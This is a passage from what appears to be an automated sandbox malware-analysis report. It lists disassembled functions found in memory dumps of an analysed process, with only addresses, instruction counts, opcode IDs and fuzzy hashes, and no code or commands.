                                                      • Instruction Fuzzy Hash: 8A313B31A006188FDB16DFA8C940ADDBBF6FF89310B158199D405AB361DB35ED05CBA0
                                                      Function 016DA263 Relevance: .1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2261786590.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_16d0000_Path.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f287c14274972a2f3556308521f046dea05e207bed9aa4da42a122c459f77147
                                                      • Instruction ID: 0c6aca5f92e0dd61fc32933c3e7823d9fb61f864ddf15673a4a1e012bf41dd31
                                                      • Opcode Fuzzy Hash: f287c14274972a2f3556308521f046dea05e207bed9aa4da42a122c459f77147
                                                      • Instruction Fuzzy Hash: A231A233C197954FE7129BB8DC613CE7F71DF86721F1A0593D040AB192E624594EC3A6
                                                      Function 016D6E00 Relevance: .1, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2261786590.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_16d0000_Path.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6eddff5636502c9b2675b1a6509616306c0cbedae1dfb658228719ee804397e1
                                                      • Instruction ID: 9494d5a85df408160a6c33578fc6715482230e3adcaa07207ab584be4d0c0ace
                                                      • Opcode Fuzzy Hash: 6eddff5636502c9b2675b1a6509616306c0cbedae1dfb658228719ee804397e1
                                                      • Instruction Fuzzy Hash: FE41EFB0D003499FDB24DFA9C880A9EBFF5BF48314F508429E819AB250DB75A946CF90
                                                      Function 016D9B78 Relevance: .1, Instructions: 74COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2261786590.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_16d0000_Path.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 94a1c68dff1feccc3665bd37f5c44493b5fb68027916a1276ef93e6f74843d57
                                                      • Instruction ID: 3ee2890429e79c2ad2dbb83121f3e22ed48607ede5d1d3040508e2fc0c806f47
                                                      • Opcode Fuzzy Hash: 94a1c68dff1feccc3665bd37f5c44493b5fb68027916a1276ef93e6f74843d57
                                                      • Instruction Fuzzy Hash: 7C217F36E006148FDB16DFA8C980ADEB7F6FF89300B0681A9D405BB311DB35AD058BA0
                                                      Function 016D8BCB Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2261786590.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_16d0000_Path.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6026ff6be535196c54e627993494d86fb00dc9e2f7011f8a0b48886e0484d15f
                                                      • Instruction ID: be649e523d054b27b209035ef3a1713d623e5c958ad45d8bdde2333bc47efe2f
                                                      • Opcode Fuzzy Hash: 6026ff6be535196c54e627993494d86fb00dc9e2f7011f8a0b48886e0484d15f
                                                      • Instruction Fuzzy Hash: E711E370D0624CDEDF39DB9CD9887ECBB76AB55319F14182AC001A7291DB7458C9CB1A
                                                      Function 0167D0A5 Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2261315485.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_167d000_Path.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 985a60c295fb14e66e3c58399280e9a676054b822634481bb26ac0b63bfb39cc
                                                      • Instruction ID: eaba884ad79381b053cfe34588ecb4d599f424637dfb2f77b3474e0c272f4593
                                                      • Opcode Fuzzy Hash: 985a60c295fb14e66e3c58399280e9a676054b822634481bb26ac0b63bfb39cc
                                                      • Instruction Fuzzy Hash: 880126310083449BF7215E59DDC4B67BF98DF412A1F18C95AEE090F282C3799842CBB2
                                                      Function 016DA2E8 Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2261786590.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_16d0000_Path.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: adda39c1041de08811d12d54bbb8b0a02fd5e333b36998c1892f0c402a969099
                                                      • Instruction ID: 68eaf34ab0b904c78ff8130cccf9e1a1ed9869823853176f15015e01c39ac547
                                                      • Opcode Fuzzy Hash: adda39c1041de08811d12d54bbb8b0a02fd5e333b36998c1892f0c402a969099
                                                      • Instruction Fuzzy Hash: 63014632E11B1A9BCB14DBA9DC441DDB7BAEFC5320F214626E21177250EBB02A5B8790
                                                      Function 016D9AF1 Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2261786590.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_16d0000_Path.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 57811615972c1fb8a46664278ff39abd2ff469213206ba9737acdf91348791bf
                                                      • Instruction ID: 604127eb81eeed9d9b37d88a4a20d2e08f02043871de608f2228a1d5dda99f5c
                                                      • Opcode Fuzzy Hash: 57811615972c1fb8a46664278ff39abd2ff469213206ba9737acdf91348791bf
                                                      • Instruction Fuzzy Hash: 59F0F633D1020897DF159BA0C895AEFBFF5AB45320F918426D403B7340DEB5690A92E2
                                                      Function 016DA360 Relevance: .0, Instructions: 39COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2261786590.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_16d0000_Path.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2c3f2819ddaec065041b88e117b0bd67ef0450de7431ec297c39a6b12d24f8f7
                                                      • Instruction ID: d7d341c8f308b13e660a43e87be14013d140f43a4a91b55aea01b21f9efaa3f9
                                                      • Opcode Fuzzy Hash: 2c3f2819ddaec065041b88e117b0bd67ef0450de7431ec297c39a6b12d24f8f7
                                                      • Instruction Fuzzy Hash: 31F09672D102089BDF159BA4C855AEFBFB6DB44310F558826D403FB340DEB56507D6D2
                                                      Function 0167D0A4 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2261315485.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_167d000_Path.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 409c9f4eb472953a693765d0518c18cd53fdc9152ecf654d75975c31723c4682
                                                      • Instruction ID: 8913ad8cebc27972e30ab76fd1db53e56b3f1a5b4fc36ea1285c4f3501492124
                                                      • Opcode Fuzzy Hash: 409c9f4eb472953a693765d0518c18cd53fdc9152ecf654d75975c31723c4682
                                                      • Instruction Fuzzy Hash: 1AF06D71405344AEE7209E1ADD84B62FFA8EF41675F18C95AED084F286C379A844CAB1
                                                      Function 016DA370 Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2261786590.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_16d0000_Path.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3ab4aa7b05321a26b57178f358c6e9966179cdb61f6fc845f125436cbfe1ddd7
                                                      • Instruction ID: f2d3f2c2ac90476ea2b90b094bcf707bf1c1435e06cd465b72c033c536788c37
                                                      • Opcode Fuzzy Hash: 3ab4aa7b05321a26b57178f358c6e9966179cdb61f6fc845f125436cbfe1ddd7
                                                      • Instruction Fuzzy Hash: 73F0BE32E102089BDF159BA4C814AEFBFB69F84310F41882AD002E7240DEB0690696D2
                                                      Function 016D9B00 Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2261786590.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_16d0000_Path.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dc0ecc12a1dbf592d7719c3b74fb7a6c58b4a571e463471ad57990f25ef3a832
                                                      • Instruction ID: a67a8d749c77da94d01081fb922cd29c3cdee8984dca975d7b62bc662bb5f565
                                                      • Opcode Fuzzy Hash: dc0ecc12a1dbf592d7719c3b74fb7a6c58b4a571e463471ad57990f25ef3a832
                                                      • Instruction Fuzzy Hash: 7AF0B432D1020897DF159B64C855AEFBFB65F44300F4184269002AB240DEB4690686D2
                                                      Function 016DA3E4 Relevance: .0, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2261786590.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_16d0000_Path.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ce23349fa026aa3c08d0e95db795c06ea72ca33b6703bb7384fe572f73cfc5ee
                                                      • Instruction ID: 7c242a6e95c9497846eb3744b1b54fdcf595268cdfbe09c0dad313147aeb1180
                                                      • Opcode Fuzzy Hash: ce23349fa026aa3c08d0e95db795c06ea72ca33b6703bb7384fe572f73cfc5ee
                                                      • Instruction Fuzzy Hash: 5AE092A0D4D351CFD71157E18C552AA7F71EB41701F55448AD042DB161DEE8960BD392